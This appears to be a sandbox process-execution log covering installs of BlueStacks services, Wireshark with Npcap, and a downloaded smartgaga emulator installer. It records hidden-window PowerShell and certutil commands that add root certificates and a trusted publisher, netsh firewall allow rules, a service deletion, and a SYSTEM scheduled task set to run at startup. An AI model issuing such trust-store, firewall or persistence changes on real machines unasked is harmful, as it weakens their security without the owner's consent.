C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe

"C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\SYSTEM32\netsh.exe

"netsh.exe" advfirewall firewall delete rule name="BlueStacks Service"

C:\Windows\SYSTEM32\netsh.exe

"netsh.exe" advfirewall firewall add rule name="BlueStacks Service" dir=in action=allow program="C:\Program Files\BlueStacks_nxt\HD-Player.exe" enable=yes

C:\Windows\SYSTEM32\netsh.exe

"netsh.exe" advfirewall firewall delete rule name="BlueStacksAppplayerWeb"

C:\Windows\SYSTEM32\netsh.exe

"netsh.exe" advfirewall firewall add rule name="BlueStacksAppplayerWeb" dir=in action=allow program="C:\Program Files\BlueStacks_nxt\BlueStacksAppplayerWeb.exe" enable=yes

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe" --cmd checkSSE3

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c "sc.exe delete BlueStacksDrv_nxt"

C:\Windows\system32\sc.exe

sc.exe delete BlueStacksDrv_nxt

C:\Windows\SYSTEM32\reg.exe

"reg.exe" EXPORT HKLM\Software\BlueStacks_nxt "C:\Users\Admin\AppData\Local\Temp\3lvshmuz.hpv\RegHKLM.txt"

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" a "C:\Users\Admin\AppData\Local\Temp\Installer.zip" -m0=LZMA:a=1 "C:\Users\Admin\AppData\Local\Temp\3lvshmuz.hpv\*"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Program Files\Wireshark\vc_redist.x64.exe

"C:\Program Files\Wireshark\vc_redist.x64.exe" /install /quiet /norestart

C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe

"C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Program Files\Wireshark\vc_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 /install /quiet /norestart

C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe

"C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{4E78029C-91BB-4449-AC86-7726A625D95F} {0F043694-806C-4425-9599-79D1FD9F7CDE} 6320

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1088 -burn.embedded BurnPipe.{463D93A8-3567-4F21-B8C9-CBC06DA677A9} {2B4FF168-7B6E-43AE-B673-9E2EA4A45AB3} 6744

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=568 -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1088 -burn.embedded BurnPipe.{463D93A8-3567-4F21-B8C9-CBC06DA677A9} {2B4FF168-7B6E-43AE-B673-9E2EA4A45AB3} 6744

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{62853DDC-EFB6-49EC-80FA-E98026F90765} {C5506270-82A3-4715-8651-7B73463817C0} 3416

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Program Files\Wireshark\npcap-1.78.exe

"C:\Program Files\Wireshark\npcap-1.78.exe" /winpcap_mode=no /loopback_support=no

C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\NPFInstall.exe

"C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\NPFInstall.exe" -n -check_dll

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "Get-ChildItem Cert:\LocalMachine\Root | Where-Object {$_.Thumbprint -eq '0563b8630d62d75abbc8ab1e4bdfb5a899b24d43'} | Sort-Object -Descending -Property FriendlyName | Select-Object -Skip 1 | Remove-Item"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "If (Get-ChildItem Cert:\LocalMachine\Root\0563b8630d62d75abbc8ab1e4bdfb5a899b24d43){certutil.exe -verifystore 'Root' '0563b8630d62d75abbc8ab1e4bdfb5a899b24d43';If($LASTEXITCODE -ne 0){Remove-Item Cert:\LocalMachine\Root\0563b8630d62d75abbc8ab1e4bdfb5a899b24d43}}"

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -verifystore Root 0563b8630d62d75abbc8ab1e4bdfb5a899b24d43

C:\Windows\SysWOW64\certutil.exe

certutil.exe -verifystore "Root" "0563b8630d62d75abbc8ab1e4bdfb5a899b24d43"

C:\Windows\SysWOW64\certutil.exe

certutil.exe -addstore -f "Root" "C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\0563b8630d62d75abbc8ab1e4bdfb5a899b24d43.sst"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "Get-ChildItem Cert:\LocalMachine\Root | Where-Object {$_.Thumbprint -eq '5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25'} | Sort-Object -Descending -Property FriendlyName | Select-Object -Skip 1 | Remove-Item"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "If (Get-ChildItem Cert:\LocalMachine\Root\5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25){certutil.exe -verifystore 'Root' '5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25';If($LASTEXITCODE -ne 0){Remove-Item Cert:\LocalMachine\Root\5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25}}"

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -verifystore Root 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25

C:\Windows\SysWOW64\certutil.exe

certutil.exe -verifystore "Root" "5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25"

C:\Windows\SysWOW64\certutil.exe

certutil.exe -addstore -f "Root" "C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25.sst"

C:\Windows\SysWOW64\certutil.exe

certutil.exe -addstore -f "TrustedPublisher" "C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\signing.p7b"

C:\Program Files\Npcap\NPFInstall.exe

"C:\Program Files\Npcap\NPFInstall.exe" -n -c

C:\Windows\SYSTEM32\pnputil.exe

pnputil.exe -e

C:\Program Files\Npcap\NPFInstall.exe

"C:\Program Files\Npcap\NPFInstall.exe" -n -iw

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Program Files\Npcap\NPFInstall.exe

"C:\Program Files\Npcap\NPFInstall.exe" -n -i

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall

C:\Windows\system32\DrvInst.exe

DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{afb04057-49f7-6643-bf63-8e1654ebcf92}\NPCAP.inf" "9" "405306be3" "000000000000014C" "WinSta0\Default" "000000000000015C" "208" "C:\Program Files\Npcap"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "Microsoft.PowerShell.Management\Start-Service -Name npcap -PassThru | Microsoft.PowerShell.Management\Stop-Service -PassThru | Microsoft.PowerShell.Management\Start-Service"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "ScheduledTasks\Register-ScheduledTask -Force -TaskName 'npcapwatchdog' -Description 'Ensure Npcap service is configured to start at boot' -Action (ScheduledTasks\New-ScheduledTaskAction -Execute 'C:\Program Files\Npcap\CheckStatus.bat') -Principal (ScheduledTasks\New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount) -Trigger (ScheduledTasks\New-ScheduledTaskTrigger -AtStartup) -Settings (ScheduledTasks\New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Compatibility Win8)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1348 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10892 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11036 /prefetch:1

C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe

"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3620 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6648 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8340 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9004 /prefetch:8

C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe

"C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe"

C:\Users\Admin\AppData\Local\Temp\is-LFFGT.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LFFGT.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp" /SL5="$805EC,839193,832512,C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

